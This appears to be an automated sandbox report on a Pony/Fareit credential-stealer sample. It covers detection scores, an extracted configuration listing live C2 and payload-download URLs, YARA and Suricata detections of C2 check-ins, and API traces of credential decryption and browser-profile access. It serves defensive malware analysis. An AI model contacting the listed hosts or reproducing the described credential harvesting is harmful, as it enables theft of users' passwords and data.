Edit tour

Windows Analysis Report
a5gvJhukP7.exe

Overview

General Information

Sample name:	a5gvJhukP7.exe renamed because original name is a hash value
Original sample name:	18579d8151a242cf2e9b69b016479481.exe
Analysis ID:	1528458
MD5:	18579d8151a242cf2e9b69b016479481
SHA1:	051bd937961bad91c2a3074eb39c001e591758d6
SHA256:	2371d8edbb2a1245b01cc06a870ddca49acb3be47b25e0fddc5d1b0032780bdf
Tags:	exePonyuser-abuse_ch
Infos:

Detection

Pony

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Pony

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

Machine Learning detection for sample

PE file has a writeable .text section

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (RtlQueryProcessDebugInformation/HeapInformation)

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Sample file is different than original file name gathered from version info

Sigma detected: Communication To Uncommon Destination Ports

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

a5gvJhukP7.exe (PID: 6436 cmdline: "C:\Users\user\Desktop\a5gvJhukP7.exe" MD5: 18579D8151A242CF2E9B69B016479481)

a5gvJhukP7.exe (PID: 6608 cmdline: "C:\Users\user\Desktop\a5gvJhukP7.exe" MD5: 18579D8151A242CF2E9B69B016479481)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
EvilPony, Ponyshe	Privately modded version of the Pony stealer.	No Attribution	https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/	https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony

Malware Configuration

Threatname: Pony

{"C2 list": ["http://209.59.219.70/forum/viewtopic.php", "http://67.215.225.205:8080/forum/viewtopic.php", "http://tokulances.sitebr.net/jV1.exe", "http://ftp.approachit.com/jZy.exe", "http://atualizacoes.issqn.net/FhPD.exe"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Pony	Yara detected Pony	Joe Security
00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x1484f:$a1: \Global Downloader 0x1400a:$a2: wiseftpsrvs.bin 0x146af:$a3: SiteServer %d\SFTP 0x146a3:$a4: %s\Keychain 0x1490d:$a5: Connections.txt 0x14c54:$a6: ftpshell.fsi 0x153af:$a7: inetcomm server passwords
00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0x1320c:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x153f6:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x12a2e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1304f:$s3: POST %s HTTP/1.0 0x13078:$s4: Accept-Encoding: identity, ;q=0 0x13185:$s4: Accept-Encoding: identity, ;q=0
00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Pony	Yara detected Pony	Joe Security
00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x1664b:$a1: \Global Downloader 0x15e06:$a2: wiseftpsrvs.bin 0x164ab:$a3: SiteServer %d\SFTP 0x1649f:$a4: %s\Keychain 0x16709:$a5: Connections.txt 0x16a50:$a6: ftpshell.fsi 0x171ab:$a7: inetcomm server passwords
00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0x15008:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x171f2:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1482a:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x14e4b:$s3: POST %s HTTP/1.0 0x14e74:$s4: Accept-Encoding: identity, ;q=0 0x14f81:$s4: Accept-Encoding: identity, ;q=0
00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Pony	Yara detected Pony	Joe Security
00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x1684f:$a1: \Global Downloader 0x1600a:$a2: wiseftpsrvs.bin 0x166af:$a3: SiteServer %d\SFTP 0x166a3:$a4: %s\Keychain 0x1690d:$a5: Connections.txt 0x16c54:$a6: ftpshell.fsi 0x173af:$a7: inetcomm server passwords
00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0x1520c:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x173f6:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14a2e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1504f:$s3: POST %s HTTP/1.0 0x15078:$s4: Accept-Encoding: identity, ;q=0 0x15185:$s4: Accept-Encoding: identity, ;q=0
Process Memory Space: a5gvJhukP7.exe PID: 6436	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: a5gvJhukP7.exe PID: 6436	JoeSecurity_Pony	Yara detected Pony	Joe Security
Process Memory Space: a5gvJhukP7.exe PID: 6436	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x49d9:$a1: \Global Downloader 0xfcbc:$a1: \Global Downloader 0x3e59:$a2: wiseftpsrvs.bin 0xf13c:$a2: wiseftpsrvs.bin 0x4894:$a3: SiteServer %d\SFTP 0xfb77:$a3: SiteServer %d\SFTP 0x4888:$a4: %s\Keychain 0xfb6b:$a4: %s\Keychain 0x4a8d:$a5: Connections.txt 0xfd70:$a5: Connections.txt 0x51d4:$a6: ftpshell.fsi 0x104b7:$a6: ftpshell.fsi 0x58e4:$a7: inetcomm server passwords 0x10bc7:$a7: inetcomm server passwords
Process Memory Space: a5gvJhukP7.exe PID: 6436	pony	Identify Pony	Brian Wallace @botnet_hunter	0x239b:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x313c:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x61cf:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0xd67e:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0xe41f:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x114b2:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x130c:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1a54:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0xc5ef:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0xcd37:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x227c:$s3: POST %s HTTP/1.0 0x30e2:$s3: POST %s HTTP/1.0 0xd55f:$s3: POST %s HTTP/1.0 0xe3c5:$s3: POST %s HTTP/1.0 0x22a5:$s4: Accept-Encoding: identity, ;q=0 0xd588:$s4: Accept-Encoding: identity, ;q=0
Process Memory Space: a5gvJhukP7.exe PID: 6608	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: a5gvJhukP7.exe PID: 6608	JoeSecurity_Pony	Yara detected Pony	Joe Security
Process Memory Space: a5gvJhukP7.exe PID: 6608	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x87f3:$a1: \Global Downloader 0x7c32:$a2: wiseftpsrvs.bin 0x86ae:$a3: SiteServer %d\SFTP 0x86a2:$a4: %s\Keychain 0x88a7:$a5: Connections.txt 0x8f8b:$a6: ftpshell.fsi 0x969b:$a7: inetcomm server passwords
Process Memory Space: a5gvJhukP7.exe PID: 6608	pony	Identify Pony	Brian Wallace @botnet_hunter	0x6174:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x6f15:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x9f86:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x50e0:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x5828:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x6055:$s3: POST %s HTTP/1.0 0x6ebb:$s3: POST %s HTTP/1.0 0x607e:$s4: Accept-Encoding: identity, ;q=0 0x1c709:$s4: Accept-Encoding: identity, ;q=0
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.3.a5gvJhukP7.exe.bab604.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.a5gvJhukP7.exe.ba0000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.a5gvJhukP7.exe.ba0000.0.unpack	JoeSecurity_Pony	Yara detected Pony	Joe Security
0.2.a5gvJhukP7.exe.ba0000.0.unpack	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x1d04f:$a1: \Global Downloader 0x1c80a:$a2: wiseftpsrvs.bin 0x1ceaf:$a3: SiteServer %d\SFTP 0x1cea3:$a4: %s\Keychain 0x1d10d:$a5: Connections.txt 0x1d454:$a6: ftpshell.fsi 0x1dbaf:$a7: inetcomm server passwords
0.2.a5gvJhukP7.exe.ba0000.0.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x1ba0c:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1dbf6:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1b22e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1b84f:$s3: POST %s HTTP/1.0 0x1b878:$s4: Accept-Encoding: identity, ;q=0 0x1b985:$s4: Accept-Encoding: identity, ;q=0
0.3.a5gvJhukP7.exe.bab604.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.3.a5gvJhukP7.exe.bab604.0.raw.unpack	JoeSecurity_Pony	Yara detected Pony	Joe Security
0.3.a5gvJhukP7.exe.bab604.0.raw.unpack	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x1424b:$a1: \Global Downloader 0x13a06:$a2: wiseftpsrvs.bin 0x140ab:$a3: SiteServer %d\SFTP 0x1409f:$a4: %s\Keychain 0x14309:$a5: Connections.txt 0x14650:$a6: ftpshell.fsi 0x14dab:$a7: inetcomm server passwords
0.3.a5gvJhukP7.exe.bab604.0.raw.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12c08:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14df2:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1242a:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12a4b:$s3: POST %s HTTP/1.0 0x12a74:$s4: Accept-Encoding: identity, ;q=0 0x12b81:$s4: Accept-Encoding: identity, ;q=0
0.2.a5gvJhukP7.exe.bab604.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.a5gvJhukP7.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.a5gvJhukP7.exe.400000.0.unpack	JoeSecurity_Pony	Yara detected Pony	Joe Security
1.2.a5gvJhukP7.exe.400000.0.unpack	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x1424b:$a1: \Global Downloader 0x13a06:$a2: wiseftpsrvs.bin 0x140ab:$a3: SiteServer %d\SFTP 0x1409f:$a4: %s\Keychain 0x14309:$a5: Connections.txt 0x14650:$a6: ftpshell.fsi 0x14dab:$a7: inetcomm server passwords
1.2.a5gvJhukP7.exe.400000.0.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12c08:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14df2:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1242a:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12a4b:$s3: POST %s HTTP/1.0 0x12a74:$s4: Accept-Encoding: identity, ;q=0 0x12b81:$s4: Accept-Encoding: identity, ;q=0
0.2.a5gvJhukP7.exe.bab604.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.a5gvJhukP7.exe.bab604.1.raw.unpack	JoeSecurity_Pony	Yara detected Pony	Joe Security
0.2.a5gvJhukP7.exe.bab604.1.raw.unpack	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x1424b:$a1: \Global Downloader 0x13a06:$a2: wiseftpsrvs.bin 0x140ab:$a3: SiteServer %d\SFTP 0x1409f:$a4: %s\Keychain 0x14309:$a5: Connections.txt 0x14650:$a6: ftpshell.fsi 0x14dab:$a7: inetcomm server passwords
0.2.a5gvJhukP7.exe.bab604.1.raw.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12c08:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14df2:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1242a:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12a4b:$s3: POST %s HTTP/1.0 0x12a74:$s4: Accept-Encoding: identity, ;q=0 0x12b81:$s4: Accept-Encoding: identity, ;q=0
1.2.a5gvJhukP7.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.a5gvJhukP7.exe.400000.0.raw.unpack	JoeSecurity_Pony	Yara detected Pony	Joe Security
1.2.a5gvJhukP7.exe.400000.0.raw.unpack	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x1664b:$a1: \Global Downloader 0x15e06:$a2: wiseftpsrvs.bin 0x164ab:$a3: SiteServer %d\SFTP 0x1649f:$a4: %s\Keychain 0x16709:$a5: Connections.txt 0x16a50:$a6: ftpshell.fsi 0x171ab:$a7: inetcomm server passwords
1.2.a5gvJhukP7.exe.400000.0.raw.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x15008:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x171f2:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1482a:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x14e4b:$s3: POST %s HTTP/1.0 0x14e74:$s4: Accept-Encoding: identity, ;q=0 0x14f81:$s4: Accept-Encoding: identity, ;q=0
Click to see the 17 entries

Sigma Signatures

System Summary

Sigma detected: Communication To Uncommon Destination Ports

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 67.215.225.205, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\a5gvJhukP7.exe, Initiated: true, ProcessId: 6608, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

Suricata Signatures

ET MALWARE Fareit/Pony Downloader Checkin 2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T23:12:03.976557+0200	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49730	67.215.225.205	8080	TCP
2024-10-07T23:12:30.334014+0200	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49737	67.215.225.205	8080	TCP
2024-10-07T23:12:56.692133+0200	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49739	67.215.225.205	8080	TCP
2024-10-07T23:13:23.053386+0200	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49887	67.215.225.205	8080	TCP
2024-10-07T23:13:49.411372+0200	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	50007	67.215.225.205	8080	TCP

ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T23:12:03.976557+0200	2014562	1	A Network Trojan was detected	192.168.2.4	49730	67.215.225.205	8080	TCP
2024-10-07T23:12:30.334014+0200	2014562	1	A Network Trojan was detected	192.168.2.4	49737	67.215.225.205	8080	TCP
2024-10-07T23:12:56.692133+0200	2014562	1	A Network Trojan was detected	192.168.2.4	49739	67.215.225.205	8080	TCP
2024-10-07T23:13:23.053386+0200	2014562	1	A Network Trojan was detected	192.168.2.4	49887	67.215.225.205	8080	TCP
2024-10-07T23:13:49.411372+0200	2014562	1	A Network Trojan was detected	192.168.2.4	50007	67.215.225.205	8080	TCP

ET MALWARE Win32.Fareit.A/Pony Downloader Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T23:12:03.965899+0200	2013934	1	Malware Command and Control Activity Detected	192.168.2.4	50007	67.215.225.205	8080	TCP
2024-10-07T23:12:25.309473+0200	2013934	1	Malware Command and Control Activity Detected	192.168.2.4	49730	67.215.225.205	8080	TCP
2024-10-07T23:12:51.671352+0200	2013934	1	Malware Command and Control Activity Detected	192.168.2.4	49737	67.215.225.205	8080	TCP
2024-10-07T23:13:18.030156+0200	2013934	1	Malware Command and Control Activity Detected	192.168.2.4	49739	67.215.225.205	8080	TCP
2024-10-07T23:13:44.389211+0200	2013934	1	Malware Command and Control Activity Detected	192.168.2.4	49887	67.215.225.205	8080	TCP

ET MALWARE Win32/Fareit Checkin 2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T23:12:03.976557+0200	2016550	1	Malware Command and Control Activity Detected	192.168.2.4	49730	67.215.225.205	8080	TCP
2024-10-07T23:12:30.334014+0200	2016550	1	Malware Command and Control Activity Detected	192.168.2.4	49737	67.215.225.205	8080	TCP
2024-10-07T23:12:56.692133+0200	2016550	1	Malware Command and Control Activity Detected	192.168.2.4	49739	67.215.225.205	8080	TCP
2024-10-07T23:13:23.053386+0200	2016550	1	Malware Command and Control Activity Detected	192.168.2.4	49887	67.215.225.205	8080	TCP
2024-10-07T23:13:49.411372+0200	2016550	1	Malware Command and Control Activity Detected	192.168.2.4	50007	67.215.225.205	8080	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: a5gvJhukP7.exe

Avira: detected

Found malware configuration

Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack

Malware Configuration Extractor: Pony {"C2 list": ["http://209.59.219.70/forum/viewtopic.php", "http://67.215.225.205:8080/forum/viewtopic.php", "http://tokulances.sitebr.net/jV1.exe", "http://ftp.approachit.com/jZy.exe", "http://atualizacoes.issqn.net/FhPD.exe"]}

Multi AV Scanner detection for submitted file

Source: a5gvJhukP7.exe

ReversingLabs: Detection: 89%

Yara detected Pony

Source: Yara match	File source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: a5gvJhukP7.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_0040A54C lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,	1_2_0040A54C
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_0040D1E9 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,	1_2_0040D1E9
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_0040CC68 lstrlenA,CryptUnprotectData,LocalFree,	1_2_0040CC68
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_0040A94F lstrlenA,CryptUnprotectData,LocalFree,	1_2_0040A94F
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_0040BA61 CryptUnprotectData,LocalFree,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,	1_2_0040BA61
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_0040421D CryptUnprotectData,LocalFree,	1_2_0040421D
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_0040A391 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree,	1_2_0040A391
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_0040A798 CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,	1_2_0040A798

Source: a5gvJhukP7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: a5gvJhukP7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_00405024 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	1_2_00405024
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_00404CB4 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	1_2_00404CB4
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_0040891F FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_0040891F
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_00403FE7 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_00403FE7
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_0040966C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	1_2_0040966C
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_0040879B FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_0040879B

Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49730 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49730 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49737 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49730 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49730 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49739 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49737 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49737 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49737 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49739 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49739 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49739 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49887 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49887 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49887 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49887 -> 67.215.225.205:8080
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:50007 -> 67.215.225.205:8080
